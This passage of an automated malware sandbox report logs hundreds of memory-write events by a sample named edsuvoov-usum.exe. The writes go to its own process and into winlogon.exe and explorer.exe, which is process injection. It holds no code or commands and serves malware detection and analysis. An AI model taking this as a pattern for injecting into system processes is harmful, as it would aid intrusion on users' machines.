Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10AC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10AD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10AE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10AF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10B90000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10BA0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10BB0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10BC0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10BD0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10BE0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10BF0000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C00000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C10000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C20000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C30000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C40000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C50000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C60000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C70000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C80000 value: 43Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: PID: 640 base: 10C90000 value: 43Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\System32\winlogon.exe base: 33890000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8540000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8040000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8510000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 86E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9020000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9030000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: A520000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: ADC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B0B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B0E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B5C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B5D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B680000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B660000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B670000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B690000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B6A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: B6B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C6E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C6F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E410000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E420000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 7790000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 83B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8360000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 83C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 83D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 83E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8400000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8410000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8420000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8EA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8EB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8EC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8EF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8ED0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8EE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9040000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BAC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BAD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BB00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BAE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BAF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: EF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: F00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: F20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: F30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: F40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: F50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BB20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: F60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BB10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BB30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E430000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E440000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E450000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E460000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E470000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E480000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E490000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E4A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E4B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E690000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E4E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E680000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E6A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E6B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E6C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E6D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E6E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E6F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E700000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E710000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E720000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E730000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E740000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E750000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E760000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E770000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E780000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E790000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E7A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E7B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8340000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 7FE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 86D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 86F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8300000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 83A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8F90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8FA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8FB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8FC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8FD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8FE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 8FF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9000000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9010000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9270000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9280000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9290000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 92A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 92B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 92C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 92D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 92E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 92F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9300000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9310000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9320000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9330000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9350000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9360000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9450000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9460000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9470000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9480000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9490000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 94A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 94B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 94E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 94F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 94D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9500000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9510000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9520000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9530000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 9540000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BBC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BBD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BBE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BBF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC40000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BC90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BCA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BCB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BCC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BDD0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BDE0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BDF0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BE00000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BE10000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BD70000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BD80000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BD90000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BE20000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BE30000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C8C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C8D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BD50000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BD60000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BDA0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BDB0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: BDC0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C8E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C8F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C900000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C910000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C920000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C930000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C940000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C950000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C960000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C970000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C980000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C990000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C9A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: C9B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E4C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E4D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E840000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E850000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E860000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E870000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E880000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E890000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E8A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E8B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E8C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E8D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E8E0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E8F0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E900000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E910000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E920000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E930000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E940000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E950000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E960000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E970000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E980000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E990000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E9A0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E9B0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E9C0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: E9D0000Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMemory written: C:\Windows\explorer.exe base: 83F0000Jump to behavior
